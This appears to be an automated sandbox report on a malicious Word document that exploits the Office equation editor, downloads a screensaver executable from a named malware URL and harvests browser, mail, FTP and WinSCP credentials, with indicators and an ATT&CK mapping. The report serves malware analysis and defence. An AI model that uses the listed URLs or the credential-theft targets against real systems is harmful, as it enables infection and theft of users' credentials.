              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\AppData\Roaming\microme09255.scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Roaming\microme09255.scrMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrMemory allocated: 22C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrMemory allocated: 900000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrMemory allocated: 390000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrMemory allocated: 22C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrMemory allocated: 9E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrThread delayed: delay time: 1200000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrWindow / User API: threadDelayed 9831Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2852Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scr TID: 3196Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scr TID: 3252Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scr TID: 3320Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scr TID: 3320Thread sleep time: -6000000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scr TID: 3324Thread sleep count: 9831 > 30Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3440Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\AppData\Roaming\microme09255.scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Roaming\microme09255.scrThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrThread delayed: delay time: 1200000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: 5.2.microme09255.scr.230000.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
              Source: 5.2.microme09255.scr.230000.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
              Source: 5.2.microme09255.scr.230000.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
              Source: 5.2.microme09255.scr.344a420.5.raw.unpack, Qy2X.csReference to suspicious API methods: ljK.OpenProcess(zK2m4hVdZK5.DuplicateHandle, bInheritHandle: true, (uint)eUXyuV2.ProcessID)
              Source: C:\Users\user\AppData\Roaming\microme09255.scrMemory written: C:\Users\user\AppData\Roaming\microme09255.scr base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\microme09255.scr "C:\Users\user\AppData\Roaming\microme09255.scr"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess created: C:\Users\user\AppData\Roaming\microme09255.scr "C:\Users\user\AppData\Roaming\microme09255.scr"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrQueries volume information: C:\Users\user\AppData\Roaming\microme09255.scr VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrQueries volume information: C:\Users\user\AppData\Roaming\microme09255.scr VolumeInformationJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 5.2.microme09255.scr.344a420.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.microme09255.scr.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.microme09255.scr.340f9f0.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.microme09255.scr.344a420.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.microme09255.scr.340f9f0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: microme09255.scr PID: 3176, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: microme09255.scr PID: 3204, type: MEMORYSTR
              Source: C:\Users\user\AppData\Roaming\microme09255.scrKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: Yara matchFile source: 5.2.microme09255.scr.344a420.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.microme09255.scr.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.microme09255.scr.340f9f0.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.microme09255.scr.344a420.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.microme09255.scr.340f9f0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.883885788.0000000002310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: microme09255.scr PID: 3176, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: microme09255.scr PID: 3204, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 5.2.microme09255.scr.344a420.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.microme09255.scr.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.microme09255.scr.340f9f0.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.microme09255.scr.344a420.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.microme09255.scr.340f9f0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: microme09255.scr PID: 3176, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: microme09255.scr PID: 3204, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Disable or Modify Tools
              2
              OS Credential Dumping
              1
              File and Directory Discovery
              Remote Services11
              Archive Collected Data
              2
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API
              Boot or Logon Initialization Scripts111
              Process Injection
              1
              Deobfuscate/Decode Files or Information
              21
              Input Capture
              24
              System Information Discovery
              Remote Desktop Protocol2
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts33
              Exploitation for Client Execution
              Logon Script (Windows)Logon Script (Windows)21
              Obfuscated Files or Information
              1
              Credentials in Registry
              11
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Install Root Certificate
              NTDS1
              Query Registry
              Distributed Component Object Model21
              Input Capture
              13
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets1
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Timestomp
              Cached Domain Credentials141
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Masquerading
              Proc Filesystem1
              Remote System Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Modify Registry
              /etc/passwd and /etc/shadow1
              System Network Configuration Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron141
              Virtualization/Sandbox Evasion
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd111
              Process Injection
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1431944 Sample: Payment Swift.doc Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 38 Multi AV Scanner detection for domain / URL 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 13 other signatures 2->44 8 WINWORD.EXE 336 13 2->8         started        process3 process4 10 EQNEDT32.EXE 11 8->10         started        15 EQNEDT32.EXE 8->15         started        dnsIp5 30 covid19help.top 104.21.83.128, 443, 49161 CLOUDFLARENETUS United States 10->30 24 C:\Users\user\AppData\...\microme09255.scr, PE32 10->24 dropped 26 C:\Users\user\AppData\Local\...\microm[1].scr, PE32 10->26 dropped 54 Installs new ROOT certificates 10->54 56 Office equation editor establishes network connection 10->56 58 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->58 17 microme09255.scr 2 10->17         started        file6 signatures7 process8 signatures9 32 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->32 34 Machine Learning detection for dropped file 17->34 36 Injects a PE file into a foreign processes 17->36 20 microme09255.scr 12 2 17->20         started        process10 dnsIp11 28 api.ipify.org 172.67.74.152, 443, 49162 CLOUDFLARENETUS United States 20->28 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->46 48 Tries to steal Mail credentials (via file / registry access) 20->48 50 Tries to harvest and steal ftp login credentials 20->50 52 2 other signatures 20->52 signatures12

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Payment Swift.doc43%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
              Payment Swift.doc46%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scr100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\microme09255.scr100%Joe Sandbox ML
              No Antivirus matches
              SourceDetectionScannerLabelLink
              covid19help.top25%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://ocsp.entrust.net030%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://ocsp.entrust.net0D0%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              https://covid19help.top/microm.scrj100%Avira URL Cloudmalware
              https://covid19help.top/microm.scrC:100%Avira URL Cloudmalware
              https://covid19help.top/microm.scr100%Avira URL Cloudphishing
              https://covid19help.top/t100%Avira URL Cloudmalware
              https://covid19help.top/microm.scrkkC:100%Avira URL Cloudmalware
              https://covid19help.top/microm.scrY100%Avira URL Cloudmalware
              https://covid19help.top/microm.scr22%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              covid19help.top
              104.21.83.128
              truetrueunknown
              api.ipify.org
              172.67.74.152
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://covid19help.top/microm.scrtrue
                • 22%, Virustotal, Browse
                • Avira URL Cloud: phishing
                unknown
                https://api.ipify.org/false
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schemas.xmlsoap.org/ws/2005/05/identitymicrome09255.scr.2.drfalse
                    high
                    http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://covid19help.top/microm.scrC:EQNEDT32.EXE, 00000002.00000003.346877641.0000000000632000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthxhttp://schemas.xmlsoap.org/ws/2005microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                      high
                      http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovincemicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                        high
                        http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintshttp://schemas.xmlsoap.org/ws/2005/microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surnamemicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationmicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                high
                                https://covid19help.top/tEQNEDT32.EXE, 00000002.00000003.346877641.000000000061B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://api.ipify.orgmicrome09255.scr, 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.883885788.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddressmicrome09255.scr.2.drfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/homephonemicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthyhttp://schemas.xmlsoap.org/ws/2005microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidrhttp://schemas.xmlsoap.org/ws/2005microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/webpagemicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                            high
                                            http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk/p_sha1EQNEDT32.EXE, 00000002.00000003.346863072.000000000426C000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/right/identitymicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                high
                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifiermicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                    high
                                                    http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/anonymousmicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemicrome09255.scr, 00000006.00000002.883885788.00000000022C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://covid19help.top/microm.scrkkC:EQNEDT32.EXE, 00000002.00000002.347780884.00000000005FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressthttp://schemas.xmlsoap.org/ws/200microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertymicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                            high
                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transform0Tranmicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifiermicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                high
                                                                https://account.dyn.com/microme09255.scr, 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transformmicrome09255.scr.2.drfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidshttp://schemas.xmlsoap.org/ws/2005microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamemicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcodemicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                            high
                                                                            https://covid19help.top/microm.scrjEQNEDT32.EXE, 00000002.00000002.347780884.00000000005FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcodezhttp://schemas.xmlsoap.org/ws/2005/microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphonemicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephonemicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/localitymicrome09255.scr.2.drfalse
                                                                                    high
                                                                                    https://api.ipify.org/tmicrome09255.scr, 00000006.00000002.883885788.00000000022C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
